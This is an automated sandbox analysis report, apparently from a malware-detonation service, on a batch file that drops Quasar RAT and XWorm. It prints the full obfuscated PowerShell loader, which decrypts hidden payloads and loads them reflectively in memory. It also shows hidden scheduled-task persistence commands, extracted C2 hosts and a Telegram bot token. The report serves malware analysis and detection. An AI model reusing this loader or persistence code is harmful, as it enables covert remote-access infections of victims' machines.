Analysis

  • max time kernel
    38s
  • max time network
    52s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    13-04-2024 17:59

General

  • Target

    Double.bat

  • Size

    1.6MB

  • MD5

    948386c98184781df692e5f11ff558f7

  • SHA1

    e8619faf83446ea78e456920834579bbf71aea20

  • SHA256

    7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f

  • SHA512

    0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

  • SSDEEP

    24576:wdgbyfVoiqSFeKsWoIk3GpiYJKVvlBU4Lr/QIEeL86NKuhRu9xyz2XP9d/qi7q:J4ogzBYGUvrxrl44RQyz2fZq

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

express-divorce.gl.at.ply.gg:22562

Mutex

6735a92b-88d2-4fbe-8e59-605a85072109

Attributes
  • encryption_key

    8681483EF512C654BECF205A0D74FFCA4B129A98

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Trapix Client Startup

  • subdirectory

    SubDir

Extracted

Family

xworm

Version

3.0

C2

traffic-collins.gl.at.ply.gg:24820

Mutex

uX6FapIHo24Z2JFZ

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7171419034:AAFHVFSxi6aVJohwci09QBtbjQ3QtjcLoBc/sendMessage?chat_id=6403260284

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:356
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_306.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_306.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_306.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3604
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3008
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2292
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4444
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "
                    9⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1628
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_991.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                      10⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4420
            • C:\Windows\system32\wermgr.exe
              "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4396" "2636" "2296" "2632" "0" "0" "2640" "0" "0" "0" "0" "0"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4472

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    ad5cd538ca58cb28ede39c108acb5785

    SHA1

    1ae910026f3dbe90ed025e9e96ead2b5399be877

    SHA256

    c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

    SHA512

    c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    2KB

    MD5

    4a19d2f0bbbfd0b860dd34dc7422b58b

    SHA1

    4334057c7d2792735d2461ffbcfa3c796f79e1c3

    SHA256

    7edd03ffa0d38ffbc336e31b6b1f4bbdbad99605e79f473e37362867623ae259

    SHA512

    018ee82f304d0f49e463cfd13bac9a2968ea543c82e7981334acf5506d2f8040eb689da8cd45b6c1ca08fa14ec47a43762525352aac33d4863bccd33fad3827e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    6c59ae289c6cd378ba3c32219b44ae24

    SHA1

    eb064e026f4ea176716ed4ec2ede9e66f196d2aa

    SHA256

    fdc6f52488f057437990155aba3dd308b7ed4faee73fe7cf9d21e53b8a952cd6

    SHA512

    e80b7deeef7a5fe16b6aef7a894c45da1ccc79d8a5360b36a664a2a36867be3f0350a06458629f8d0e7671b4b0e0d2050efbc0cde61e068cb60a6719fb67dadc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    bb4d79c418d1df838dc1dfb6db57501d

    SHA1

    903525e7a2dac8f931e1ba2f87e1bb1dea08a867

    SHA256

    f1bf5360d8ede0205136292027ecff131b04d6cfd7bbb9ab146472de948c771f

    SHA512

    43b3c6ae5facdd7c1d59ff23b5681919252900a7c9cf16270ae51e98372648d1b67323dd1f86745266acc751c0bd8f17e7400c903a02c8f7ca5c74e450c25eee

  • C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

    Filesize

    54KB

    MD5

    795363cfbf5d3fca47edc4cbc247a1c0

    SHA1

    9374d05486b0b62977825d07f748fa03cca3c864

    SHA256

    84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6

    SHA512

    c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikc30dv.m3g.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Roaming\startup_str_306.bat

    Filesize

    1.6MB

    MD5

    948386c98184781df692e5f11ff558f7

    SHA1

    e8619faf83446ea78e456920834579bbf71aea20

    SHA256

    7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f

    SHA512

    0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

  • C:\Users\Admin\AppData\Roaming\startup_str_306.vbs

    Filesize

    115B

    MD5

    dc4450363ab10c9f55eaf2d492874449

    SHA1

    e24646e2935bac1e28d52a61d6d66137c9456bdc

    SHA256

    66289b23354835c32537852ad0db8b3a1577e6ceb302260b9559fa18954d894e

    SHA512

    679080f157f9a10aa36aa0db4b005aaed74bdb6d2fdcbcfd37f236c42be5a4b2add257757bc6012ce0f77d16e7503bfb0bc57adf6714cc84d227cc5444179619

  • C:\Users\Admin\AppData\Roaming\startup_str_991.vbs

    Filesize

    115B

    MD5

    31ad013b3aa57b3fbb6cb1e560d05fe7

    SHA1

    fd7e96db28efd6baed7cd97e90dadb8f58b0c162

    SHA256

    fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb

    SHA512

    f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28

  • memory/356-54-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

    Filesize

    64KB

  • memory/356-38-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

    Filesize

    64KB

  • memory/356-39-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

    Filesize

    64KB

  • memory/356-37-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/356-72-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/2292-165-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

    Filesize

    64KB

  • memory/2292-162-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

    Filesize

    64KB

  • memory/2292-201-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

    Filesize

    64KB

  • memory/2292-206-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/2292-161-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/2292-181-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

    Filesize

    64KB

  • memory/3008-254-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/3008-151-0x000001856BD90000-0x000001856BD98000-memory.dmp

    Filesize

    32KB

  • memory/3008-132-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

    Filesize

    64KB

  • memory/3008-133-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

    Filesize

    64KB

  • memory/3008-244-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

    Filesize

    64KB

  • memory/3008-230-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/3008-146-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

    Filesize

    64KB

  • memory/3008-152-0x000001856BED0000-0x000001856BEDC000-memory.dmp

    Filesize

    48KB

  • memory/3008-130-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4112-10-0x000001C425BF0000-0x000001C425C66000-memory.dmp

    Filesize

    472KB

  • memory/4112-27-0x000001C425C70000-0x000001C425DB0000-memory.dmp

    Filesize

    1.2MB

  • memory/4112-111-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4112-21-0x000001C425930000-0x000001C425940000-memory.dmp

    Filesize

    64KB

  • memory/4112-5-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4112-6-0x000001C425930000-0x000001C425940000-memory.dmp

    Filesize

    64KB

  • memory/4112-7-0x000001C425930000-0x000001C425940000-memory.dmp

    Filesize

    64KB

  • memory/4112-4-0x000001C425A40000-0x000001C425A62000-memory.dmp

    Filesize

    136KB

  • memory/4112-26-0x000001C425BD0000-0x000001C425BD8000-memory.dmp

    Filesize

    32KB

  • memory/4396-223-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4396-117-0x0000017EC89D0000-0x0000017EC8CF4000-memory.dmp

    Filesize

    3.1MB

  • memory/4396-124-0x0000017EC8FE0000-0x0000017EC9092000-memory.dmp

    Filesize

    712KB

  • memory/4396-86-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4396-125-0x0000017EC9D60000-0x0000017EC9F22000-memory.dmp

    Filesize

    1.8MB

  • memory/4396-90-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4396-105-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4396-225-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4396-255-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4396-198-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4396-123-0x0000017EC8ED0000-0x0000017EC8F20000-memory.dmp

    Filesize

    320KB

  • memory/4396-91-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4396-233-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

    Filesize

    64KB

  • memory/4420-232-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

    Filesize

    64KB

  • memory/4420-247-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

    Filesize

    64KB

  • memory/4420-250-0x000001E8455F0000-0x000001E8455FE000-memory.dmp

    Filesize

    56KB

  • memory/4420-228-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

    Filesize

    64KB

  • memory/4420-227-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4420-256-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

    Filesize

    9.9MB

  • memory/4420-257-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

    Filesize

    64KB

  • memory/4420-258-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

    Filesize

    64KB